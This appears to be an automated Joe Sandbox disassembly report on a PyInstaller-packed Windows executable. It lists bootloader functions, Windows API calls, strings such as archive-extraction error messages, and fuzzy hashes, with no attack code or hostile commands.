Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: 0e0501ae70892a156c6bad2bbe0f38e510e31de69640afa6e057b4f1f9e113f0
Instruction ID: 3cb1ba7aae3b474ddee403b4c47d8a7268c03a2eb9ef22f408a64b9ada84eeae
Opcode Fuzzy Hash: 0e0501ae70892a156c6bad2bbe0f38e510e31de69640afa6e057b4f1f9e113f0
Instruction Fuzzy Hash: 45328C22A0C68291FB25BB2594543B9E391AF4C780FC44036DA6D4B2D6FFACE554E3F1

Function 00007FF7FD755C70 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF7FD755CB5

Part of subcall function 00007FF7FD755608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD75561C

Part of subcall function 00007FF7FD74A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FD752D92,?,?,?,00007FF7FD752DCF,?,?,00000000,00007FF7FD753295,?,?,?,00007FF7FD7531C7), ref: 00007FF7FD74A9CE
Part of subcall function 00007FF7FD74A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FD752D92,?,?,?,00007FF7FD752DCF,?,?,00000000,00007FF7FD753295,?,?,?,00007FF7FD7531C7), ref: 00007FF7FD74A9D8

Part of subcall function 00007FF7FD74A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7FD74A94F,?,?,?,?,?,00007FF7FD74A83A), ref: 00007FF7FD74A979
Part of subcall function 00007FF7FD74A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7FD74A94F,?,?,?,?,?,00007FF7FD74A83A), ref: 00007FF7FD74A99E

_get_daylight.LIBCMT ref: 00007FF7FD755CA4

Part of subcall function 00007FF7FD755668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD75567C

_get_daylight.LIBCMT ref: 00007FF7FD755F1A
_get_daylight.LIBCMT ref: 00007FF7FD755F2B
_get_daylight.LIBCMT ref: 00007FF7FD755F3C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FD75617C), ref: 00007FF7FD755F63

Strings

Eastern Standard Time, xrefs: 00007FF7FD756009
Eastern Summer Time, xrefs: 00007FF7FD756021

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction ID: 9c7a1cef631207d6d06aa64d3ae2c9a64728cbb81b8a47acfff759ac00d5987b
Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction Fuzzy Hash: 39D1CF2AA1C24286E721FF2194416B9A361EF4C794FD0813AEA2D4F6D5FE3CE44187F1

Function 00007FF7FD7569D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7FD756708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD756749
Part of subcall function 00007FF7FD756708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7567C7
Part of subcall function 00007FF7FD756708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD756818

CreateFileW.KERNELBASE ref: 00007FF7FD756ADA
CreateFileW.KERNEL32 ref: 00007FF7FD756B2A
GetLastError.KERNEL32 ref: 00007FF7FD756B5A
GetFileType.KERNELBASE ref: 00007FF7FD756B6F
GetLastError.KERNEL32 ref: 00007FF7FD756B79
CloseHandle.KERNEL32 ref: 00007FF7FD756BAC
CloseHandle.KERNEL32 ref: 00007FF7FD756D0F
CreateFileW.KERNEL32 ref: 00007FF7FD756D44
GetLastError.KERNEL32 ref: 00007FF7FD756D53

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: a6bbff4bc43bdbfaded86996932570d60840d051a9d39eee5161db0844443191
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 79C1CF32B2CA4185EB50EF65C4902AD7761FB4DB98B914235DE2E5B7D4EF38E051C3A0

Function 00007FF7FD7383B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF7FD738B09,00007FF7FD733FA5), ref: 00007FF7FD73841B
RemoveDirectoryW.KERNEL32(?,00007FF7FD738B09,00007FF7FD733FA5), ref: 00007FF7FD73849E
DeleteFileW.KERNELBASE(?,00007FF7FD738B09,00007FF7FD733FA5), ref: 00007FF7FD7384BD
FindNextFileW.KERNELBASE(?,00007FF7FD738B09,00007FF7FD733FA5), ref: 00007FF7FD7384CB
FindClose.KERNELBASE(?,00007FF7FD738B09,00007FF7FD733FA5), ref: 00007FF7FD7384DC
RemoveDirectoryW.KERNELBASE(?,00007FF7FD738B09,00007FF7FD733FA5), ref: 00007FF7FD7384E5

Strings

%s\*, xrefs: 00007FF7FD7383E2

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: 0f7013bda73de0f04a59b17b7a0aa9f22a8e3f4f9916f8f951e32b70bb5ae5ef
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 6F417F21A0C94295EB60AF64E4842B9E360FB9C750FC00232D9AD4AAC4FF7DD54A97F0

Function 00007FF7FD755EEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF7FD755F1A

Part of subcall function 00007FF7FD755668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD75567C

_get_daylight.LIBCMT ref: 00007FF7FD755F2B

Part of subcall function 00007FF7FD755608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD75561C

_get_daylight.LIBCMT ref: 00007FF7FD755F3C

Part of subcall function 00007FF7FD755638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD75564C

Part of subcall function 00007FF7FD74A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FD752D92,?,?,?,00007FF7FD752DCF,?,?,00000000,00007FF7FD753295,?,?,?,00007FF7FD7531C7), ref: 00007FF7FD74A9CE
Part of subcall function 00007FF7FD74A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FD752D92,?,?,?,00007FF7FD752DCF,?,?,00000000,00007FF7FD753295,?,?,?,00007FF7FD7531C7), ref: 00007FF7FD74A9D8

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FD75617C), ref: 00007FF7FD755F63

Strings

Eastern Standard Time, xrefs: 00007FF7FD756009
Eastern Summer Time, xrefs: 00007FF7FD756021

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction ID: 392666dd686b317978e0d26ffc99365ea9e33a1b410e4e3c0869f265d415d51d
Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction Fuzzy Hash: C2514E26A1C64286E720FF21D8816A9E761BB4C784FC48535EA6D4B6D6FF3CE44087F1

Function 00007FF7FD7392F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF7FD739323
FindClose.KERNELBASE ref: 00007FF7FD739332

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 76f49f0b4e14a1917f0b307388c9e70502cdc3814abfd053d9ae5be082e3ed03
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 8EF0C862A1C741C6F7A09F60B44977AB350AB8C324F844335D9BD066D4EF7CD0489BA0

Function 00007FF7FD750938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: bad501610014e1cdc6c499c7082c31cf8545e120da90287810ba884d6b5c72a5
Instruction ID: 4e97bbff3eb5c24940fcd31131504b2b6c0af1dadea5334b35b692b0a53ef2b0
Opcode Fuzzy Hash: bad501610014e1cdc6c499c7082c31cf8545e120da90287810ba884d6b5c72a5
Instruction Fuzzy Hash: F7027C21A1D64280FB55BB119405379A690AF4EBA0FD94635ED7D4E3D2FE3CB40193F2

Function 00007FF7FD731950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7FD737F80: _fread_nolock.LIBCMT ref: 00007FF7FD73802A

_fread_nolock.LIBCMT ref: 00007FF7FD731A1B

Part of subcall function 00007FF7FD732910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7FD731B6A), ref: 00007FF7FD73295E

Strings

MEI, xrefs: 00007FF7FD731991
Error on file., xrefs: 00007FF7FD731B8D
Failed to seek to cookie position!, xrefs: 00007FF7FD7319EE
Failed to read cookie!, xrefs: 00007FF7FD731A2B
Could not read full TOC!, xrefs: 00007FF7FD731B55
Could not allocate buffer for TOC!, xrefs: 00007FF7FD731B1B
fread, xrefs: 00007FF7FD731A32, 00007FF7FD731B5C
fseek, xrefs: 00007FF7FD7319F5
calloc, xrefs: 00007FF7FD731A68
malloc, xrefs: 00007FF7FD731B22
Could not allocate memory for archive structure!, xrefs: 00007FF7FD731A61

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 108a8d02a6157e670ce837df6f512bb3cf3af97172153b5a289a747e10b990d7
Instruction ID: 8a6f4a69bad28e62d3f507de8f86d82c7e4aa56a233fd5c3f4523c912f6af849
Opcode Fuzzy Hash: 108a8d02a6157e670ce837df6f512bb3cf3af97172153b5a289a747e10b990d7
Instruction Fuzzy Hash: 3B819E72A0C68685EB20EB24D0443B9A3A0AF4D784FC44432E9AD4B7C5FEBDE54597F1

Function 00007FF7FD731600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF7FD7316A2
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF7FD731742
Failed to create symbolic link %s!, xrefs: 00007FF7FD731622
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7FD7317DF
fwrite, xrefs: 00007FF7FD7317D1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7FD7316DA
Failed to extract %s: failed to open target file!, xrefs: 00007FF7FD73165C
fread, xrefs: 00007FF7FD7317E6
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7FD7317CA
fseek, xrefs: 00007FF7FD7316E1
malloc, xrefs: 00007FF7FD731749
fopen, xrefs: 00007FF7FD731663

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 4c4f57570c96911f8988b3eadf4b516915a9d1fc1d6a92d49b2ab5855c3148e8
Instruction ID: a7c9fea942f0ad2a43b7e0b8370639d625c1586dc91ef3ca4987415360f59a95
Opcode Fuzzy Hash: 4c4f57570c96911f8988b3eadf4b516915a9d1fc1d6a92d49b2ab5855c3148e8
Instruction Fuzzy Hash: 08516822A0C64692EB10BB5294002B9A3A0BF49794FC44531EE2C0B6D6FEBCF555A7F0

Function 00007FF7FD738850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF7FD733CBB), ref: 00007FF7FD7388F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF7FD733CBB), ref: 00007FF7FD7388FA
CreateDirectoryW.KERNELBASE(?,00000000,00007FF7FD733CBB), ref: 00007FF7FD73893C

Part of subcall function 00007FF7FD738A20: GetEnvironmentVariableW.KERNEL32(00007FF7FD73388E), ref: 00007FF7FD738A57
Part of subcall function 00007FF7FD738A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7FD738A79

Part of subcall function 00007FF7FD7482A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7482C1

Part of subcall function 00007FF7FD732810: MessageBoxW.USER32 ref: 00007FF7FD7328EA

Strings

TMP, xrefs: 00007FF7FD7388B2
TMP, xrefs: 00007FF7FD73888C, 00007FF7FD738993
_MEI%d, xrefs: 00007FF7FD738902
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF7FD73896E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF7FD7388CC

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction ID: caba292b52418ed5551cff431fb0809327c6cd286cf73ce73020b0fb869737ba
Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction Fuzzy Hash: 6241B112A1D65285EB11BB22A8552FAD290AF8D784FC44031ED2D4F7DAFE7CE504A3F1

Function 00007FF7FD731210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7FD7312EF
1.3.1, xrefs: 00007FF7FD731249
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7FD731276
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7FD73141E
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7FD7312BA
malloc, xrefs: 00007FF7FD7312C1, 00007FF7FD7312F6

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
Instruction ID: b8e026f2919f32513092abf222a2f7af00ece6221b2f6fe72f02f0a01981ff39
Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
Instruction Fuzzy Hash: 6D51AE23A0CA8285E761BB12A4003BAA390BF89794FC44535ED6D4B7C9FE7CE50197F0

Function 00007FF7FD74ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF7FD74F11A,?,?,-00000018,00007FF7FD74ADC3,?,?,?,00007FF7FD74ACBA,?,?,?,00007FF7FD745FAE), ref: 00007FF7FD74EEFC
GetProcAddress.KERNEL32(?,?,?,00007FF7FD74F11A,?,?,-00000018,00007FF7FD74ADC3,?,?,?,00007FF7FD74ACBA,?,?,?,00007FF7FD745FAE), ref: 00007FF7FD74EF08

Strings

api-ms-, xrefs: 00007FF7FD74EE46
ext-ms-, xrefs: 00007FF7FD74EE59

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: cfcdbc4fd282aa25e56c4238e91d9b5197804ec7c0a7019f63c51cfc78870562
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: 5841AE21B1DA12C1FB16EB169808676A291BF4EBA0FC84539DD2D4B7C4FE3DE44582F0

Function 00007FF7FD7336B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7FD733804), ref: 00007FF7FD7336E1
GetLastError.KERNEL32(?,00007FF7FD733804), ref: 00007FF7FD7336EB

Part of subcall function 00007FF7FD732C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FD733706,?,00007FF7FD733804), ref: 00007FF7FD732C9E
Part of subcall function 00007FF7FD732C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FD733706,?,00007FF7FD733804), ref: 00007FF7FD732D63
Part of subcall function 00007FF7FD732C50: MessageBoxW.USER32 ref: 00007FF7FD732D99

Strings

\\?\, xrefs: 00007FF7FD73375A
Failed to resolve full path to executable %ls., xrefs: 00007FF7FD733739
